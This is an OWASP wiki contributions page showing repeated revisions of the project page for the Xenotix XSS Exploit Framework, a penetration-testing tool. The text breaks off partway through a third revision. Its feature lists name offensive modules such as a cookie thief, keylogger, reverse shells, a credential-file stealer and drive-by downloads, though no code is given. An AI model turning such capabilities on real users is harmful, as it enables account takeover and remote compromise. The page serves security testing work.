OWASP - User contributions [en]

OWASP Xenotix XSS Exploit Framework

2017-08-21T13:32:11Z

Ajin Abraham: removed all download links from owasp page

=Main=

<div style="width:100%;height:90px;border:0,margin:0;overflow: hidden;">[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Low False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
: [[Media: Xenotixxssexploitframeworkbyajinabraham-130820064955-phpapp02.pdf | Download PDF ]]

'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework]]

== NEWS AND EVENTS ==
* [19 Mar 2014] Xenotix XSS Exploit Framework V6.2 is Released
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector
** HSTS+ CSP Visited Sites Grabber

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

== Downloads ==
<div style="font-size:120%;border:none;margin: 0;color:#000">

Get Xenotix Binaries: https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.2 Changes==
* Added more Payloads
* New Info Gathering Module HSTS+CSP Visited Sites Detection
* Bug Fix Hash Calculator
* Bug Fix - Get Fuzzer
* Bug Fix IP2Geolocation
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS on Google Docs]

[[Media:Xenotix_XSS_Protection_CheatSheet_For_Developers.pdf| Download PDF from owasp.org]]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2016-03-19T07:23:26Z

Ajin Abraham:

=Main=

<div style="width:100%;height:90px;border:0,margin:0;overflow: hidden;">[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]

== NEWS AND EVENTS ==
* [19 Mar 2014] Xenotix XSS Exploit Framework V6.2 is Released
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector
** HSTS+ CSP Visited Sites Grabber

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]
SHA256: 68096d574aacf51cea46708d473d5c6b13d3b5039c8f3587d2325c9bdefdcbc1
====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6.1 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip | MD5: 17c703f90dbb4f09b112284232bbb69f
*Version 6.1 Mirror: https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view | MD5: 17c703f90dbb4f09b112284232bbb69f
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>

= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.2 Changes==
* Added more Payloads
* New Info Gathering Module HSTS+CSP Visited Sites Detection
* Bug Fix Hash Calculator
* Bug Fix - Get Fuzzer
* Bug Fix IP2Geolocation
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2016-03-19T06:43:08Z

Ajin Abraham: v6.1 update

=Main=

<div style="width:100%;height:90px;border:0,margin:0;overflow: hidden;">[[File: lab_big.jpg|link=OWASP_Project_Stages#tab.3DLab_Projects]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]

== NEWS AND EVENTS ==
* [19 Mar 2014] Xenotix XSS Exploit Framework V6.2 is Released
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector
** HSTS+ CSP Visited Sites Grabber

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
